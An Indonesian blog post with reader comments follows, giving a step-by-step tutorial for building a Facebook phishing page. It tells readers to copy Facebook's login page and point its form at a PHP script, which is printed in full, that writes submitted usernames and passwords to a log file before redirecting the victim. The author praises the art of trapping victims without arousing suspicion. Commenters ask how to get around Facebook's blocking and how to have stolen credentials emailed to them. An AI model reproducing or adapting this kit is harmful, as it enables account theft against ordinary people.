Hi, apa kabar? Akhirnya, setelah vakum selama kurang lebih 3 minggu saya bisa nulis lagi disini. Kemarin-kemarin saya (sok) sibuk fokus ke UTS, mudah-mudahan hasilnya memuaskan. Amin :)
Jika anda pembaca setia blog ini tentunya anda sudah tahu tentang phishing yang saya tulis pada Hacking Facebook Account dan Hacking Facebook Account II yang didalamya terdapat beberapa contoh fake login untuk mencuri data yang diinputkan user. Nah, disini saya masih akan membahas tentang phishing menggunakan fake login, tapi tidak seperti sebelumnya: saya menyediakan fake login siap pakai, kali ini saya akan menunjukan bagaimana cara membuat fake login.
Membuat fake login tidak sesulit kelihatanya, bahkan sangat mudah. Tapi, menurut saya seni dalam fake login adalah bagaimana cara attacker membuat korban masuk dan tenggelam dalam perangkap yang sudah disediakan tanpa pernah curiga.
Baiklah, yang perlu anda siapkan adalah:
Halaman Fake Login
Pertama, buka halaman yang akan ada jadikan fake login (misal: facebook.com). Setelah itu, untuk anda pengguna:
Mozilla Firefox, pilih View - Page Source atau tekan Ctrl + U
Internet Explorer, pilih View - Source
Jika anda menggunakan web browser lain, silahkan cari sendiri karena saya cuma menggunakan Mozilla Firefox, sedangkan untuk Internet Explorer cuma ada karena saya menggunakan Windows (BJ).
Setelah anda menemukan source code halaman login tersebut, copy-kan kode tersebut kedalam notepad.
Masih pada notepad yang berisi souce code tadi, cari
action=
lalu ubah url setelah "=" menjadi "login.php"
Kemudian save dengan nama index.html
Script PHP
Salin kode php di bawah ini kedalam notepad baru:
<?php
header("Location: http://facebook.com");
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>Save dengan nama login.php
File *.txt Kosong
Buat saja sebuat file txt kosong dengan nama log.txt (anda bisa membuat dengan nama lain, tapi jangan lupa samakan namanya dengan yang ada pada baris ke 3 file login.php)
Selesai, mudah bukan? Itulah dasar membuat fake login, sekarang tinggal bagaimana cara anda mengembangkanya.
Bila anda belum tahu apa yang harus dilakukan setelah membuat ketiga file tersebut, silahkan baca atrikel saya sebelumnya: Hacking Facebook Account dan Hacking Facebook Account II
Terima kasih.
4 komentar:
May 19, 2011 at 6:42 PM
Lanjutkan gan.. :D
August 18, 2011 at 11:07 AM
Ane udh coba tu gan tp fake login ane,ane taro d pesan atw coment fb gk bs gan..
Malah ane dpt pesan blokir dr fb ny gan.
Knp ya gan?mohon bntu gan.
Ane pke my3gb gan.Ane udh coba tu gan tp fake login ane,ane taro d pesan atw coment fb gk bs gan..
Malah ane dpt pesan blokir dr fb ny gan.
Knp ya gan?mohon bntu gan.
Ane pke my3gb gan.
September 25, 2011 at 5:40 AM
sekarang emg banyak penyedia hosting gratis yg masuk blacklist nya fb salah satunya my3gb.. hehe
December 29, 2011 at 9:49 PM
gan,, gimana ya cara supaya setiap email dan password yang harusnya masuk ke log.txt bisa langsung dikirimkan saja ke email ane sebagai pesan text..???
Post a Comment